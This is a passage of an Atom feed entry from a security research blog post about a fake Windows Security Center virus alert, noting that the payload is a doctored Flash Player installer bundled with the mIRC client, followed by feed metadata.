id="BLOGGER_PHOTO_ID_5335069365529249138" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Of course, the &lt;a href="http://www.threatexpert.com/report.aspx?md5=108daf642d3a5d20c42ca97484798b94"&gt;payload&lt;/a&gt; appears to be a bit different, serving up a doctored install_flash_player_9.04.exe package that includes the legitimate mIRC client.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-3737201483883728583?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/WXawa9gFikM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/3737201483883728583/comments/default" title="Post Comments" /><link rel="replies" type="text/html" 
href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=3737201483883728583" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/3737201483883728583" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/3737201483883728583" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/WXawa9gFikM/windows-security-center-and-virus-i.html" title="Windows Security Center and Virus (I-Worm.Trojan.b)" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_YaXoRZbsXc4/SgnRzC5xz_I/AAAAAAAAA0I/4rIGJr5tKfI/s72-c/confirm_xp.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/05/windows-security-center-and-virus-i.html</feedburner:origLink></entry></feed>
